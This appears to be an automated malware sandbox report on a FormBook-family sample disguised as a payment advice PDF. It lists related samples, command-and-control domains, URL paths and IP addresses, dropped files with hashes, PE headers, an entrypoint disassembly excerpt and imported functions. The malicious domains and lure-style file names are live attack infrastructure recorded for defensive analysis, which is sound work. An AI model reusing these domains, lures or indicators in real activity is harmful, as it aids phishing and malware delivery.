                                                            RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini01.click/abla/
                                                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini01.click/phdl/
                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini01.click/lybf/
                                                            SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                            • www.tempatmudisini01.click/r9rj/
                                                            163.44.185.183Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.sankan-fukushi.info/aayz/
                                                            DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.sankan-fukushi.info/qq1e/
                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.sankan-fukushi.info/9k5s/
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.sankan-fukushi.info/21k5/
                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                            • www.sankan-fukushi.info/p9qy/
                                                            order I 018629.xlsxGet hashmaliciousFormBookBrowse
                                                            • www.hihoha-menu.com/g24i/?Ij=C5lZ/tNmDIazGhz+mgSCdtEua581lzsfl6vwo2v3mqTQwnv5rjnUBpQzMVK0NvbkQlVLQw==&0f=e0DHTPtxAZK
                                                            104.21.62.184payments.exeGet hashmaliciousFormBookBrowse
                                                            • www.questmatch.pro/z3ox/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.aziziyeescortg.xyzSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 188.114.96.3
                                                            natroredirect.natrocdn.comlgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            New Order.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 85.159.66.93
                                                            CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                            • 85.159.66.93
                                                            www.questmatch.proW3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 172.67.138.37
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.138.37
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.62.184
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 188.114.96.3
                                                            www.conansog.shopTNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                            • 172.67.162.12
                                                            Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.41.74
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.162.12
                                                            FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.41.74
                                                            ssl.goentri.comCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.221.243
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 76.223.74.74
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 76.223.74.74
                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                            • 76.223.74.74

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.165.166
                                                            ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.67.152
                                                            Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.67.152
                                                            XE5p2qNoWt.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                            • 104.21.12.202
                                                            C9wUCfwfeT.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                            • 104.21.73.230
                                                            764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            LINKNET-ID-APLinknetASNIDpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 139.43.38.141
                                                            botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 139.34.248.206
                                                            file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                                                            • 103.21.221.64
                                                            botx.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 139.40.24.215
                                                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                            • 139.0.5.101
                                                            nabx86.elfGet hashmaliciousUnknownBrowse
                                                            • 139.41.101.186
                                                            xobftuootu.elfGet hashmaliciousUnknownBrowse
                                                            • 139.66.166.95
                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 139.68.11.77
                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 103.21.221.87
                                                            splppc.elfGet hashmaliciousUnknownBrowse
                                                            • 139.40.118.68
                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.165.166
                                                            ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.67.152
                                                            Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 104.21.67.152
                                                            XE5p2qNoWt.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                            • 104.21.12.202
                                                            C9wUCfwfeT.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                            • 104.21.73.230
                                                            764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.177.134
                                                            INTERQGMOInternetIncJPhttps://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.comGet hashmaliciousUnknownBrowse
                                                            • 118.27.122.26
                                                            teste.m68k.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                            • 150.95.219.245
                                                            botx.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 157.7.222.3
                                                            https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                            • 118.27.122.26
                                                            REMITTANCE_PAYMENT54342Saic.htmlGet hashmaliciousPhisherBrowse
                                                            • 157.7.107.50
                                                            Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 163.44.185.183
                                                            la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 210.253.96.32
                                                            DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 163.44.185.183
                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 163.44.185.183
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 163.44.185.183

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\3q3Zl7JL

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\rasautou.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:modified
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1215420383712111
                                                            Encrypted:false
                                                            SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                            MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                            SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                            SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                            SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\Hegeleos

                                                            Download File
                                                            Process:C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):290304
                                                            Entropy (8bit):7.995857345038708
                                                            Encrypted:true
                                                            SSDEEP:6144:1iVtpkPdUYIu/BQALC7R+uC/z6F8t9q/MjsSGO71:MkGJxl70L/c8MFSGa1
                                                            MD5:BA2B84A19E0AF259CD4AC9D497938E1E
                                                            SHA1:6ADCADBFFACDC735F4B277F1E5247FD8C5E4C7AD
                                                            SHA-256:110AE6955A70789A883FDF4E00C27EDD95F16281E47C3925D82BEB95CB605748
                                                            SHA-512:C798479127481EFD5AB317AEE7692A599DB7D07892384239C739578CF64346ED12774EFC531CD103D62BB41132C7307CAC4AF6962955D88E472BA36C95964691
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...RYD35J3OT..FG.U0XAS73.VKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD.5N3AK.DF.L...@....>"2g" 5#AT#.,5%$)3e7Ux3&Y.%8k...r7+WP`>B^oJFGEU0X8R>.q6,.z25.ySR.)...p& .O..oWT.L..n2=.a\-[r4,.FGEU0XASgvLV.@FRy.ie5N3OTKJF.EW1S@X73.RKAGRRZD35. OTKZFGE%4XASw3LFKAGPRZB35N3OTKLFGEU0XASG7LVIAGRRZD15..OT[JFWEU0XQS7#LVKAGRBZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKo37*.D35.iKTKZFGE.4XAC73LVKAGRRZD35N.OT+JFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKA

                                                            C:\Users\user\AppData\Local\Temp\autA4FA.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):290304
                                                            Entropy (8bit):7.995857345038708
                                                            Encrypted:true
                                                            SSDEEP:6144:1iVtpkPdUYIu/BQALC7R+uC/z6F8t9q/MjsSGO71:MkGJxl70L/c8MFSGa1
                                                            MD5:BA2B84A19E0AF259CD4AC9D497938E1E
                                                            SHA1:6ADCADBFFACDC735F4B277F1E5247FD8C5E4C7AD
                                                            SHA-256:110AE6955A70789A883FDF4E00C27EDD95F16281E47C3925D82BEB95CB605748
                                                            SHA-512:C798479127481EFD5AB317AEE7692A599DB7D07892384239C739578CF64346ED12774EFC531CD103D62BB41132C7307CAC4AF6962955D88E472BA36C95964691
                                                            Malicious:false
                                                            Preview:...RYD35J3OT..FG.U0XAS73.VKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD.5N3AK.DF.L...@....>"2g" 5#AT#.,5%$)3e7Ux3&Y.%8k...r7+WP`>B^oJFGEU0X8R>.q6,.z25.ySR.)...p& .O..oWT.L..n2=.a\-[r4,.FGEU0XASgvLV.@FRy.ie5N3OTKJF.EW1S@X73.RKAGRRZD35. OTKZFGE%4XASw3LFKAGPRZB35N3OTKLFGEU0XASG7LVIAGRRZD15..OT[JFWEU0XQS7#LVKAGRBZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKo37*.D35.iKTKZFGE.4XAC73LVKAGRRZD35N.OT+JFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKAGRRZD35N3OTKJFGEU0XAS73LVKA

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.20885172122878
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:rPaymentAdviceNote_pdf.exe
                                                            File size:1'226'752 bytes
                                                            MD5:c05461f24e430ecaf9b9106de5cafa70
                                                            SHA1:fc9e05b0c90db7a9f782908664d11fa2144abaed
                                                            SHA256:ce0b1bf28e5d0fc774caafecde07534057e36df193dc2ea9599e256a0b2f4a2c
                                                            SHA512:1f796c023ce5a5b6def72b0ed67c9b13e6206cc00ffccf432e961d68c9f41790fae8ee2fb3fdf4243d649946212d6369ea971df3faa2ee59bb890076b103d458
                                                            SSDEEP:24576:3u6J33O0c+JY5UZ+XC0kGso6FaCP37HU5KTp3UPxcIFCT8mnjHWY:Ru0c++OCvkGs9FaCQwmPWpT8UyY
                                                            TLSH:5B45CF2273DDC360CB769173BF69B7016EBF38614630B95B2F880D7DA950162262D7A3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                            File Icon

                                                            Icon Hash:aaf3e3e3938382a0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x427dcd
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6751A3B6 [Thu Dec 5 12:59:34 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007FCF1CE625EAh
                                                            jmp 00007FCF1CE553B4h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007FCF1CE5553Ah
                                                            cmp edi, eax
                                                            jc 00007FCF1CE5589Eh
                                                            bt dword ptr [004C31FCh], 01h
                                                            jnc 00007FCF1CE55539h
                                                            rep movsb
                                                            jmp 00007FCF1CE5584Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007FCF1CE55704h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007FCF1CE55540h
                                                            bt dword ptr [004BE324h], 01h
                                                            jc 00007FCF1CE55A10h
                                                            bt dword ptr [004C31FCh], 00000000h
                                                            jnc 00007FCF1CE556DDh
                                                            test edi, 00000003h
                                                            jne 00007FCF1CE556EEh
                                                            test esi, 00000003h
                                                            jne 00007FCF1CE556CDh
                                                            bt edi, 02h
                                                            jnc 00007FCF1CE5553Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007FCF1CE55543h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007FCF1CE55595h
                                                            bt esi, 03h
                                                            jnc 00007FCF1CE555E8h

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD4 build 31101
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD4 build 31101

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x62f74.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x711c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc70000x62f740x630001f30e099ffe75f3ee00e7a86da46be2aFalse0.933902008364899data7.906845238607475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x12a0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xcf7b80x5a23bdata1.0003277258803231
                                                            RT_GROUP_ICON0x1299f40x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x129a6c0x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x129a800x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x129a940x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x129aa80xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x129b840x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                            Imports

                                                            DLLImport
                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
